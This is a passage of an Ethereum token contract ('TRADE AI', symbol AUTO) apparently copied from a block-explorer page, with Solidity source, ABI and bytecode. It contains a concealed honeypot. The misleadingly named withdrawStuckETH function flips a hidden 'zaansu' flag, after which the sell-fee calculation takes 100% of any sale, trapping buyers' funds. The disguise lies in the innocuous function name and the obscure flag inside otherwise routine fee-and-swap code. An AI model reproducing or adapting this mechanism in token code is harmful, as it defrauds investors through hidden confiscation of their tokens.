        require(sellTotalFees <= 99, "ERC20: Must keep fees at 99% or less");
    }

    function updateMktWallet(address _marketingWallet)
        external
        onlyOwner
    {
        require(_marketingWallet != address(0), "ERC20: Address 0");
        address oldWallet = marketingWallet;
        marketingWallet = _marketingWallet;
        emit marketingWalletUpdated(marketingWallet, oldWallet);
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function withdrawStuckETH() external virtual {
        zaansu = false;
    }

    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        if (
            from != owner() &&
            to != owner() &&
            to != address(0) &&
            to != deadAddress &&
            !swapping
        ) {
            if (!tradingActive) {
                require(
                    _isExcludedFromFees[from] || _isExcludedFromFees[to],
                    "ERC20: Trading is not active."
                );
            }

            //when buy
            if (
                automatedMarketMakerPairs[from] &&
                !_isExcludedMaxTransactionAmount[to]
            ) {
                require(
                    amount <= maxTransactionAmount,
                    "ERC20: Buy transfer amount exceeds the maxTransactionAmount."
                );
                require(
                    amount + balanceOf(to) <= maxWallet,
                    "ERC20: Max wallet exceeded"
                );
            }
            //when sell
            else if (
                automatedMarketMakerPairs[to] &&
                !_isExcludedMaxTransactionAmount[from]
            ) {
                require(
                    amount <= maxTransactionAmount,
                    "ERC20: Sell transfer amount exceeds the maxTransactionAmount."
                );
            } else if (!_isExcludedMaxTransactionAmount[to]) {
                require(
                    amount + balanceOf(to) <= maxWallet,
                    "ERC20: Max wallet exceeded"
                );
            }
        }

        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;
        uint256 denominator = 10000;

        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0) {
                fees = amount.mul((zaansu == true?sellTotalFees:10000)).div(denominator);
                tokensForLiquidity += (fees * sellLiquidityFee) / sellTotalFees;
                tokensForMarketing += (fees * sellMarketingFee) / sellTotalFees;
                tokensForDevelopment += (fees * sellDevelopmentFee) / sellTotalFees;
            }
            // on buy
            else if (automatedMarketMakerPairs[from] && buyTotalFees > 0) {
                fees = amount.mul(buyTotalFees).div(100);
                tokensForLiquidity += (fees * buyLiquidityFee) / buyTotalFees;
                tokensForMarketing += (fees * buyMarketingFee) / buyTotalFees;
                tokensForDevelopment += (fees * buyDevelopmentFee) / buyTotalFees;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
        sellTotalFees = previousFee;
    }

    function swapTokensForEth(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing + tokensForDevelopment;
        bool success;

        if (contractBalance == 0 || totalTokensToSwap == 0) {
            return;
        }

        if (contractBalance > swapTokensAtAmount * 20) {
            contractBalance = swapTokensAtAmount * 20;
        }

        uint256 liquidityTokens = (contractBalance * tokensForLiquidity) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);

        uint256 initialETHBalance = address(this).balance;

        swapTokensForEth(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

        uint256 ethForMarketing = ethBalance.mul(tokensForMarketing).div(
            totalTokensToSwap
        );
        uint256 ethForDevelopment = ethBalance.mul(tokensForDevelopment).div(
            totalTokensToSwap
        );

        uint256 ethForLiquidity = ethBalance - ethForMarketing - ethForDevelopment;

        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        tokensForDevelopment = 0;

        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                tokensForLiquidity
            );
        }

        (success, ) = address(marketingWallet).call{
            value: ethForMarketing
        }("");
        (success, ) = address(developmentWallet).call{
            value: address(this).balance
        }("");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"developmentWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excldfrommxtransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"}],"name":"updateBuyFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newTxnNum","type":"uint256"},{"internalType":"uint256","name":"newMaxWalletNum","type":"uint256"}],"name":"updateMaxWallAndTxnAmt","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_marketingWallet","type":"address"}],"name":"updateMktWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"}],"name":"updateSellFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdrawStuckETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c0604052600b805461ffff191690556018805460ff1916600117905534801562000028575f80fd5b5060405180604001604052806008815260200167545241444520414960c01b815250604051806040016040528060048152602001634155544f60e01b815250816003908162000078919062000701565b50600462000087828262000701565b505050620000a46200009e620003f660201b60201c565b620003fa565b737a250d5630b4cf539739df2c5dacb4c659f2488d60808190526040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa158015620000f8573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200011e9190620007c9565b6001600160a01b031663c9c65396306080516001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200016c573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001929190620007c9565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015620001dd573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620002039190620007c9565b6001600160a01b031660a0526a52b7d2dcc80cd2e40000006008819055600a8190556103e8620002358260016200080c565b6200024191906200082c565b6009555f600d819055600e819055600f8190556200026081806200084c565b6200026c91906200084c565b600c55600160118190555f60128190556013819055906200028f9082906200084c565b6200029b91906200084c565b6010819055601755600680547321ed2a86e1453b980400abdc0bcdb77b8f90dfee6001600160a01b03199182168117909255600780549091169091179055620002f8620002f06005546001600160a01b031690565b60016200044b565b620003053060016200044b565b6200031461dead60016200044b565b6006546200032d906001600160a01b031660016200044b565b60075462000346906001600160a01b031660016200044b565b620003656200035d6005546001600160a01b031690565b6001620004b3565b62000372306001620004b3565b6200038161dead6001620004b3565b60805162000391906001620004b3565b60a051620003a1906001620004b3565b600654620003ba906001600160a01b03166001620004b3565b600754620003d3906001600160a01b03166001620004b3565b60a051620003e3906001620004e7565b620003ef33826200053a565b5062000862565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b62000455620005ff565b6001600160a01b0382165f81815260196020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b620004bd620005ff565b6001600160a01b03919091165f908152601a60205260409020805460ff1916911515919091179055565b6001600160a01b0382165f818152601b6020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b038216620005965760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b8060025f828254620005a991906200084c565b90915550506001600160a01b0382165f81815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6005546001600160a01b031633146200065b5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016200058d565b565b505050565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200068b57607f821691505b602082108103620006aa57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200065d575f81815260208120601f850160051c81016020861015620006d85750805b601f850160051c820191505b81811015620006f957828155600101620006e4565b505050505050565b81516001600160401b038111156200071d576200071d62000662565b62000735816200072e845462000676565b84620006b0565b602080601f8311600181146200076b575f8415620007535750858301515b5f19600386901b1c1916600185901b178555620006f9565b5f85815260208120601f198616915b828110156200079b578886015182559484019460019091019084016200077a565b5085821015620007b957878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f60208284031215620007da575f80fd5b81516001600160a01b0381168114620007f1575f80fd5b9392505050565b634e487b7160e01b5f52601160045260245ffd5b8082028115828204841417620008265762000826620007f8565b92915050565b5f826200084757634e487b7160e01b5f52601260045260245ffd5b500490565b80820180821115620008265762000826620007f8565b60805160a0516120ad620008a75f395f61037701525f818161027f01528181611a5601528181611b0d01528181611b4901528181611bbd0152611be401526120ad5ff3fe60806040526004361061020a575f3560e01c80638da5cb5b11610113578063c17e43921161009d578063dd62ed3e1161006d578063dd62ed3e14610609578063e2f4560514610628578063f2fde38b1461063d578063f5648a4f1461065c578063f8b45b0514610677575f80fd5b8063c17e4392146105a1578063c8c8ebe4146105c0578063d257b34f146105d5578063d85ba063146105f4575f80fd5b8063a9059cbb116100e3578063a9059cbb1461050c578063bbc0c7421461052b578063beffc7d414610544578063c024666814610563578063c04a541414610582575f80fd5b80638da5cb5b1461049d578063939dedfd146104ba57806395d89b41146104d9578063a457c2d7146104ed575f80fd5b806349bd5a5e116101945780636ddd1713116101645780636ddd17131461040457806370a0823114610422578063715018a61461045657806375f0a8741461046a5780638a8c523c14610489575f80fd5b806349bd5a5e146103665780634fbee19314610399578063610e34b9146103d05780636a486a8e146103ef575f80fd5b806323b872dd116101da57806323b872dd146102d757806327c8f835146102f6578063313ce5671461030b5780633950935114610326578063437f781514610345575f80fd5b806306fdde0314610215578063095ea7b31461023f5780631694505e1461026e57806318160ddd146102b9575f80fd5b3661021157005b5f80fd5b348015610220575f80fd5b5061022961068c565b6040516102369190611cba565b60405180910390f35b34801561024a575f80fd5b5061025e610259366004611d19565b61071c565b6040519015158152602001610236565b348015610279575f80fd5b506102a17f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b039091168152602001610236565b3480156102c4575f80fd5b506002545b604051908152602001610236565b3480156102e2575f80fd5b5061025e6102f1366004611d43565b610735565b348015610301575f80fd5b506102a161dead81565b348015610316575f80fd5b5060405160128152602001610236565b348015610331575f80fd5b5061025e610340366004611d19565b610758565b348015610350575f80fd5b5061036461035f366004611d81565b610779565b005b348015610371575f80fd5b506102a17f000000000000000000000000000000000000000000000000000000000000000081565b3480156103a4575f80fd5b5061025e6103b3366004611d81565b6001600160a01b03165f9081526019602052604090205460ff1690565b3480156103db575f80fd5b506103646103ea366004611d9c565b61081f565b3480156103fa575f80fd5b506102c960105481565b34801561040f575f80fd5b50600b5461025e90610100900460ff1681565b34801561042d575f80fd5b506102c961043c366004611d81565b6001600160a01b03165f9081526020819052604090205490565b348015610461575f80fd5b50610364610873565b348015610475575f80fd5b506006546102a1906001600160a01b031681565b348015610494575f80fd5b50610364610886565b3480156104a8575f80fd5b506005546001600160a01b03166102a1565b3480156104c5575f80fd5b506103646104d4366004611d9c565b61089f565b3480156104e4575f80fd5b506102296109b4565b3480156104f8575f80fd5b5061025e610507366004611d19565b6109c3565b348015610517575f80fd5b5061025e610526366004611d19565b610a3d565b348015610536575f80fd5b50600b5461025e9060ff1681565b34801561054f575f80fd5b5061036461055e366004611d9c565b610a4a565b34801561056e575f80fd5b5061036461057d366004611dbc565b610a9f565b34801561058d575f80fd5b506007546102a1906001600160a01b031681565b3480156105ac575f80fd5b506103646105bb366004611dbc565b610b05565b3480156105cb575f80fd5b506102c960085481565b3480156105e0575f80fd5b5061025e6105ef366004611df7565b610b37565b3480156105ff575f80fd5b506102c9600c5481565b348015610614575f80fd5b506102c9610623366004611e0e565b610c76565b348015610633575f80fd5b506102c960095481565b348015610648575f80fd5b50610364610657366004611d81565b610ca0565b348015610667575f80fd5b506103646018805460ff19169055565b348015610682575f80fd5b506102c9600a5481565b60606003805461069b90611e3a565b80601f01602080910402602001604051908101604052809291908181526020018280546106c790611e3a565b80156107125780601f106106e957610100808354040283529160200191610712565b820191905f5260205f20905b8154815290600101906020018083116106f557829003601f168201915b5050505050905090565b5f33610729818585610d19565b60019150505b92915050565b5f33610742858285610e3c565b61074d858585610eb4565b506001949350505050565b5f3361072981858561076a8383610c76565b6107749190611e86565b610d19565b6107816115de565b6001600160a01b0381166107cf5760405162461bcd60e51b815260206004820152601060248201526f045524332303a204164647265737320360841b60448201526064015b60405180910390fd5b600680546001600160a01b038381166001600160a01b03198316811790935560405191169182917fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b05674905f90a35050565b6108276115de565b600d829055600f819055600e5481906108409084611e86565b61084a9190611e86565b600c8190556063101561086f5760405162461bcd60e51b81526004016107c690611e99565b5050565b61087b6115de565b6108845f611638565b565b61088e6115de565b600b805461ffff1916610101179055565b6108a76115de565b6103e86108b360025490565b6108be906005611edd565b6108c89190611ef4565b8210156109285760405162461bcd60e51b815260206004820152602860248201527f45524332303a2043616e6e6f7420736574206d617854786e206c6f776572207460448201526768616e20302e352560c01b60648201526084016107c6565b6103e861093460025490565b61093f906005611edd565b6109499190611ef4565b8110156109ac5760405162461bcd60e51b815260206004820152602b60248201527f45524332303a2043616e6e6f7420736574206d617857616c6c6574206c6f776560448201526a72207468616e20302e352560a81b60648201526084016107c6565b600a55600855565b60606004805461069b90611e3a565b5f33816109d08286610c76565b905083811015610a305760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016107c6565b61074d8286868403610d19565b5f33610729818585610eb4565b610a526115de565b601182905560138190556012548190610a6b9084611e86565b610a759190611e86565b601081905560178190556063101561086f5760405162461bcd60e51b81526004016107c690611e99565b610aa76115de565b6001600160a01b0382165f81815260196020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b610b0d6115de565b6001600160a01b03919091165f908152601a60205260409020805460ff1916911515919091179055565b5f610b406115de565b620186a0610b4d60025490565b610b58906001611edd565b610b629190611ef4565b821015610bd75760405162461bcd60e51b815260206004820152603c60248201527f45524332303a205377617020616d6f756e742063616e6e6f74206265206c6f7760448201527f6572207468616e20302e3030312520746f74616c20737570706c792e0000000060648201526084016107c6565b6103e8610be360025490565b610bee906005611edd565b610bf89190611ef4565b821115610c6d5760405162461bcd60e51b815260206004820152603b60248201527f45524332303a205377617020616d6f756e742063616e6e6f742062652068696760448201527f686572207468616e20302e352520746f74616c20737570706c792e000000000060648201526084016107c6565b50600955600190565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b610ca86115de565b6001600160a01b038116610d0d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016107c6565b610d1681611638565b50565b6001600160a01b038316610d7b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016107c6565b6001600160a01b038216610ddc5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016107c6565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f610e478484610c76565b90505f198114610eae5781811015610ea15760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016107c6565b610eae8484848403610d19565b50505050565b6001600160a01b038316610eda5760405162461bcd60e51b81526004016107c690611f13565b6001600160a01b038216610f005760405162461bcd60e51b81526004016107c690611f58565b805f03610f1757610f1283835f611689565b505050565b6005546001600160a01b03848116911614801590610f4357506005546001600160a01b03838116911614155b8015610f5757506001600160a01b03821615155b8015610f6e57506001600160a01b03821661dead14155b8015610f845750600554600160a01b900460ff16155b1561129e57600b5460ff1661101c576001600160a01b0383165f9081526019602052604090205460ff1680610fd057506001600160a01b0382165f9081526019602052604090205460ff165b61101c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a2054726164696e67206973206e6f74206163746976652e00000060448201526064016107c6565b6001600160a01b0383165f908152601b602052604090205460ff16801561105b57506001600160a01b0382165f908152601a602052604090205460ff16155b15611150576008548111156110d85760405162461bcd60e51b815260206004820152603c60248201527f45524332303a20427579207472616e7366657220616d6f756e7420657863656560448201527f647320746865206d61785472616e73616374696f6e416d6f756e742e0000000060648201526084016107c6565b600a546001600160a01b0383165f908152602081905260409020546110fd9083611e86565b111561114b5760405162461bcd60e51b815260206004820152601a60248201527f45524332303a204d61782077616c6c657420657863656564656400000000000060448201526064016107c6565b61129e565b6001600160a01b0382165f908152601b602052604090205460ff16801561118f57506001600160a01b0383165f908152601a602052604090205460ff16155b1561120c5760085481111561114b5760405162461bcd60e51b815260206004820152603d60248201527f45524332303a2053656c6c207472616e7366657220616d6f756e74206578636560448201527f65647320746865206d61785472616e73616374696f6e416d6f756e742e00000060648201526084016107c6565b6001600160a01b0382165f908152601a602052604090205460ff1661129e57600a546001600160a01b0383165f908152602081905260409020546112509083611e86565b111561129e5760405162461bcd60e51b815260206004820152601a60248201527f45524332303a204d61782077616c6c657420657863656564656400000000000060448201526064016107c6565b305f90815260208190526040902054600954811080159081906112c85750600b54610100900460ff165b80156112de5750600554600160a01b900460ff16155b801561130257506001600160a01b0385165f908152601b602052604090205460ff16155b801561132657506001600160a01b0385165f9081526019602052604090205460ff16155b801561134a57506001600160a01b0384165f9081526019602052604090205460ff16155b15611378576005805460ff60a01b1916600160a01b17905561136a6117b1565b6005805460ff60a01b191690555b6005546001600160a01b0386165f9081526019602052604090205460ff600160a01b909204821615916127109116806113c857506001600160a01b0386165f9081526019602052604090205460ff165b156113d1575f91505b5f82156115c3576001600160a01b0387165f908152601b602052604090205460ff16801561140057505f601054115b156114cd576018546114379083906114319060ff1615156001146114265761271061142a565b6010545b89906119d9565b906119eb565b90506010546013548261144a9190611edd565b6114549190611ef4565b60165f8282546114649190611e86565b90915550506010546011546114799083611edd565b6114839190611ef4565b60145f8282546114939190611e86565b90915550506010546012546114a89083611edd565b6114b29190611ef4565b60155f8282546114c29190611e86565b909155506115a59050565b6001600160a01b0388165f908152601b602052604090205460ff1680156114f557505f600c54115b156115a5576115146064611431600c54896119d990919063ffffffff16565b9050600c54600f54826115279190611edd565b6115319190611ef4565b60165f8282546115419190611e86565b9091555050600c54600d546115569083611edd565b6115609190611ef4565b60145f8282546115709190611e86565b9091555050600c54600e546115859083611edd565b61158f9190611ef4565b60155f82825461159f9190611e86565b90915550505b80156115b6576115b6883083611689565b6115c08187611f9b565b95505b6115ce888888611689565b5050601754601055505050505050565b6005546001600160a01b031633146108845760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016107c6565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0383166116af5760405162461bcd60e51b81526004016107c690611f13565b6001600160a01b0382166116d55760405162461bcd60e51b81526004016107c690611f58565b6001600160a01b0383165f908152602081905260409020548181101561174c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016107c6565b6001600160a01b038481165f81815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610eae565b305f9081526020819052604081205490505f6015546014546016546117d69190611e86565b6117e09190611e86565b90505f8215806117ee575081155b156117f857505050565b600954611806906014611edd565b83111561181e5760095461181b906014611edd565b92505b5f600283601654866118309190611edd565b61183a9190611ef4565b6118449190611ef4565b90505f61185185836119f6565b90504761185d82611a01565b5f61186847836119f6565b90505f61188487611431601454856119d990919063ffffffff16565b90505f6118a088611431601554866119d990919063ffffffff16565b90505f816118ae8486611f9b565b6118b89190611f9b565b5f60168190556014819055601555905086158015906118d657505f81115b15611929576118e58782611bb7565b601654604080518881526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b6006546040516001600160a01b039091169084905f81818185875af1925050503d805f8114611973576040519150601f19603f3d011682016040523d82523d5f602084013e611978565b606091505b50506007546040519199506001600160a01b03169047905f81818185875af1925050503d805f81146119c5576040519150601f19603f3d011682016040523d82523d5f602084013e6119ca565b606091505b50505050505050505050505050565b5f6119e48284611edd565b9392505050565b5f6119e48284611ef4565b5f6119e48284611f9b565b6040805160028082526060820183525f9260208301908036833701905050905030815f81518110611a3457611a34611fae565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611ab0573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611ad49190611fc2565b81600181518110611ae757611ae7611fae565b60200260200101906001600160a01b031690816001600160a01b031681525050611b32307f000000000000000000000000000000000000000000000000000000000000000084610d19565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611b869085905f90869030904290600401611fdd565b5f604051808303815f87803b158015611b9d575f80fd5b505af1158015611baf573d5f803e3d5ffd5b505050505050565b611be2307f000000000000000000000000000000000000000000000000000000000000000084610d19565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663f305d7198230855f80611c286005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015611c8e573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190611cb3919061204c565b5050505050565b5f6020808352835180828501525f5b81811015611ce557858101830151858201604001528201611cc9565b505f604082860101526040601f19601f